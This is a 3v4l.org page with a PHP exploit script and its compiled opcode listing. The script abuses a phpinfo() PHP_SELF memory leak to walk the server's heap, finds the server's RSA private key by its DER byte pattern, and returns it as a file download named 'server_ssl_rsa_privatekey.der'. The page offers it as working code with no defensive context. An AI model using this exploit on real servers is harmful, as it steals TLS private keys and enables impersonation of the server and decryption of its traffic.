3v4l.org

<?php
  set_time_limit(0);

  /* set a starting position for the heap scan */
  /* script will crash immediately if trying to access illegal memory */
  $starthi = 0xb788;

  if (isset($_GET['start'])) {
    $starthi = $_GET['start'] + 0;
  }

  /* initialize some stuff */
  $i = 0; $z = 0; $olddata = ""; $keydata = "";

  /* Unfortunately PHP is problematic when it comes to
     32bit unsigned numbers - we have to fake it
     like this */

  $PHP_SELF = ($starthi << 16) | $i;

  while (true) {

    $data = "";

    while (strlen($data) < 4096) {

      /* perform the infoleak */
      ob_start();
      @phpinfo(INFO_VARIABLES);
      $var = ob_get_contents();
      ob_get_clean();

      /* extract the leaked data from output */
      $r = preg_match("|PHP_SELF.</td><td class=\"v\">(.*).</td></tr>|mUs",$var,$match);

      /* we need to handle the "no value" case */
      $var = $match[1];
      if ($var == "<i>no value</i>") $var = chr(0); else $var .= chr(0);

      /* Ohhh and we need to decode the entities added by PHP */
      $var = html_entity_decode($var,ENT_QUOTES,"ISO-8859-1");

      /* Append leaked data to output */
      $data .= $var;
      $i += strlen($var);

      /* $i will keep the lower 16 bits and $z the upper 16 bits */
      if ($i > 0xffff) $z++;
      $i = $i & 0xffff;

      /* recalculate next address */
      $PHP_SELF = ($starthi + $z)<<16 | $i;
    }

    /* we combine the data with the previous data
       to handle partial keys */
    $check = $olddata . $data;
    $olddata = $data;
    $data = $check;

    /* Now check if we have a key candidate */
    $position = strpos($data, "\x30\x82");
    if ($position !== false && $position < strlen($data)-1024) {
      if (substr($data, $position+4, 4) == "\x02\x01\x00\x02") {
        $length = ord($data[$position+2])*256+ord($data[$position+3])+4;
        $keydata = substr($data, $position, $length);
        // Assume an exponent of 0x10001 to really find a RSA key and not a DSA one
        if (strpos($keydata, "\x01\x00\x01") > 0)
          break;
      }
    }
  }

  if (strlen($keydata) == 0) {
    header("Content-type: text/plain");
    die ("Unexpected error!!!");
  }

  header("Content-type: application/octet-stream");
  header("Content-Disposition: attachment; filename=\"server_ssl_rsa_privatekey.der\"");
  echo $keydata;

?>
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 7, Position 2 = 11
Branch analysis from position: 7
1 jumps found. (Code = 42) Position 1 = 118
Branch analysis from position: 118
2 jumps found. (Code = 44) Position 1 = 119, Position 2 = 19
Branch analysis from position: 119
2 jumps found. (Code = 43) Position 1 = 122, Position 2 = 126
Branch analysis from position: 122
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 126
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 19
1 jumps found. (Code = 42) Position 1 = 64
Branch analysis from position: 64
2 jumps found. (Code = 44) Position 1 = 67, Position 2 = 21
Branch analysis from position: 67
2 jumps found. (Code = 46) Position 1 = 78, Position 2 = 82
Branch analysis from position: 78
2 jumps found. (Code = 43) Position 1 = 83, Position 2 = 118
Branch analysis from position: 83
2 jumps found. (Code = 43) Position 1 = 91, Position 2 = 118
Branch analysis from position: 91
2 jumps found. (Code = 43) Position 1 = 117, Position 2 = 118
Branch analysis from position: 117
1 jumps found. (Code = 42) Position 1 = 119
Branch analysis from position: 119
Branch analysis from position: 118
Branch analysis from position: 118
Branch analysis from position: 118
Branch analysis from position: 82
Branch analysis from position: 21
2 jumps found. (Code = 43) Position 1 = 43, Position 2 = 45
Branch analysis from position: 43
1 jumps found. (Code = 42) Position 1 = 46
Branch analysis from position: 46
2 jumps found. (Code = 43) Position 1 = 57, Position 2 = 58
Branch analysis from position: 57
2 jumps found. (Code = 44) Position 1 = 67, Position 2 = 21
Branch analysis from position: 67
Branch analysis from position: 21
Branch analysis from position: 58
Branch analysis from position: 45
2 jumps found. (Code = 43) Position 1 = 57, Position 2 = 58
Branch analysis from position: 57
Branch analysis from position: 58
Branch analysis from position: 11
filename:       /in/51rfh
function name:  (null)
number of ops:  134
compiled vars:  !0 = $starthi, !1 = $i, !2 = $z, !3 = $olddata, !4 = $keydata, !5 = $PHP_SELF, !6 = $data, !7 = $var, !8 = $r, !9 = $match, !10 = $check, !11 = $position, !12 = $length
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   INIT_FCALL                                               'set_time_limit'
          1        SEND_VAL                                                 0
          2        DO_ICALL                                                 
    6     3        ASSIGN                                                   !0, 46984
    8     4        FETCH_IS                                         ~15     '_GET'
          5        ISSET_ISEMPTY_DIM_OBJ                         0          ~15, 'start'
          6      > JMPZ                                                     ~16, ->11
    9     7    >   FETCH_R                      global              ~17     '_GET'
          8        FETCH_DIM_R                                      ~18     ~17, 'start'
          9        ADD                                              ~19     ~18, 0
         10        ASSIGN                                                   !0, ~19
   13    11    >   ASSIGN                                                   !1, 0
         12        ASSIGN                                                   !2, 0
         13        ASSIGN                                                   !3, ''
         14        ASSIGN                                                   !4, ''
   19    15        SL                                               ~25     !0, 16
         16        BW_OR                                            ~26     !1, ~25
         17        ASSIGN                                                   !5, ~26
   21    18      > JMP                                                      ->118
   23    19    >   ASSIGN                                                   !6, ''
   25    20      > JMP                                                      ->64
   28    21    >   INIT_FCALL                                               'ob_start'
         22        DO_ICALL                                                 
   29    23        BEGIN_SILENCE                                    ~30     
         24        INIT_FCALL                                               'phpinfo'
         25        SEND_VAL                                                 32
         26        DO_ICALL                                                 
         27        END_SILENCE                                              ~30
   30    28        INIT_FCALL                                               'ob_get_contents'
         29        DO_ICALL                                         $32     
         30        ASSIGN                                                   !7, $32
   31    31        INIT_FCALL                                               'ob_get_clean'
         32        DO_ICALL                                                 
   34    33        INIT_FCALL                                               'preg_match'
         34        SEND_VAL                                                 '%7CPHP_SELF.%3C%2Ftd%3E%3Ctd+class%3D%22v%22%3E%28.%2A%29.%3C%2Ftd%3E%3C%2Ftr%3E%7CmUs'
         35        SEND_VAR                                                 !7
         36        SEND_REF                                                 !9
         37        DO_ICALL                                         $35     
         38        ASSIGN                                                   !8, $35
   37    39        FETCH_DIM_R                                      ~37     !9, 1
         40        ASSIGN                                                   !7, ~37
   38    41        IS_EQUAL                                                 !7, '%3Ci%3Eno+value%3C%2Fi%3E'
         42      > JMPZ                                                     ~39, ->45
         43    >   ASSIGN                                                   !7, '%00'
         44      > JMP                                                      ->46
         45    >   ASSIGN_OP                                     8          !7, '%00'
   41    46    >   INIT_FCALL                                               'html_entity_decode'
         47        SEND_VAR                                                 !7
         48        SEND_VAL                                                 3
         49        SEND_VAL                                                 'ISO-8859-1'
         50        DO_ICALL                                         $42     
         51        ASSIGN                                                   !7, $42
   44    52        ASSIGN_OP                                     8          !6, !7
   45    53        STRLEN                                           ~45     !7
         54        ASSIGN_OP                                     1          !1, ~45
   48    55        IS_SMALLER                                               65535, !1
         56      > JMPZ                                                     ~47, ->58
         57    >   PRE_INC                                                  !2
   49    58    >   BW_AND                                           ~49     !1, 65535
         59        ASSIGN                                                   !1, ~49
   52    60        ADD                                              ~51     !0, !2
         61        SL                                               ~52     ~51, 16
         62        BW_OR                                            ~53     !1, ~52
         63        ASSIGN                                                   !5, ~53
   25    64    >   STRLEN                                           ~55     !6
         65        IS_SMALLER                                               ~55, 4096
         66      > JMPNZ                                                    ~56, ->21
   57    67    >   CONCAT                                           ~57     !3, !6
         68        ASSIGN                                                   !10, ~57
   58    69        ASSIGN                                                   !3, !6
   59    70        ASSIGN                                                   !6, !10
   62    71        INIT_FCALL                                               'strpos'
         72        SEND_VAR                                                 !6
         73        SEND_VAL                                                 '0%82'
         74        DO_ICALL                                         $61     
         75        ASSIGN                                                   !11, $61
   63    76        TYPE_CHECK                                  1018  ~63     !11
         77      > JMPZ_EX                                          ~63     ~63, ->82
         78    >   STRLEN                                           ~64     !6
         79        SUB                                              ~65     ~64, 1024
         80        IS_SMALLER                                       ~66     !11, ~65
         81        BOOL                                             ~63     ~66
         82    > > JMPZ                                                     ~63, ->118
   64    83    >   INIT_FCALL                                               'substr'
         84        SEND_VAR                                                 !6
         85        ADD                                              ~67     !11, 4
         86        SEND_VAL                                                 ~67
         87        SEND_VAL                                                 4
         88        DO_ICALL                                         $68     
         89        IS_EQUAL                                                 $68, '%02%01%00%02'
         90      > JMPZ                                                     ~69, ->118
   65    91    >   INIT_FCALL                                               'ord'
         92        ADD                                              ~70     !11, 2
         93        FETCH_DIM_R                                      ~71     !6, ~70
         94        SEND_VAL                                                 ~71
         95        DO_ICALL                                         $72     
         96        MUL                                              ~73     $72, 256
         97        INIT_FCALL                                               'ord'
         98        ADD                                              ~74     !11, 3
         99        FETCH_DIM_R                                      ~75     !6, ~74
        100        SEND_VAL                                                 ~75
        101        DO_ICALL                                         $76     
        102        ADD                                              ~77     ~73, $76
        103        ADD                                              ~78     ~77, 4
        104        ASSIGN                                                   !12, ~78
   66   105        INIT_FCALL                                               'substr'
        106        SEND_VAR                                                 !6
        107        SEND_VAR                                                 !11
        108        SEND_VAR                                                 !12
        109        DO_ICALL                                         $80     
        110        ASSIGN                                                   !4, $80
   68   111        INIT_FCALL                                               'strpos'
        112        SEND_VAR                                                 !4
        113        SEND_VAL                                                 '%01%00%01'
        114        DO_ICALL                                         $82     
        115        IS_SMALLER                                               0, $82
        116      > JMPZ                                                     ~83, ->118
   69   117    > > JMP                                                      ->119
   21   118    > > JMPNZ                                                    <true>, ->19
   74   119    >   STRLEN                                           ~84     !4
        120        IS_EQUAL                                                 ~84, 0
        121      > JMPZ                                                     ~85, ->126
   75   122    >   INIT_FCALL                                               'header'
        123        SEND_VAL                                                 'Content-type%3A+text%2Fplain'
        124        DO_ICALL                                                 
   76   125      > EXIT                                                     'Unexpected+error%21%21%21'
   79   126    >   INIT_FCALL                                               'header'
        127        SEND_VAL                                                 'Content-type%3A+application%2Foctet-stream'
        128        DO_ICALL                                                 
   80   129        INIT_FCALL                                               'header'
        130        SEND_VAL                                                 'Content-Disposition%3A+attachment%3B+filename%3D%22server_ssl_rsa_privatekey.der%22'
        131        DO_ICALL                                                 
   81   132        ECHO                                                     !4
   83   133      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0

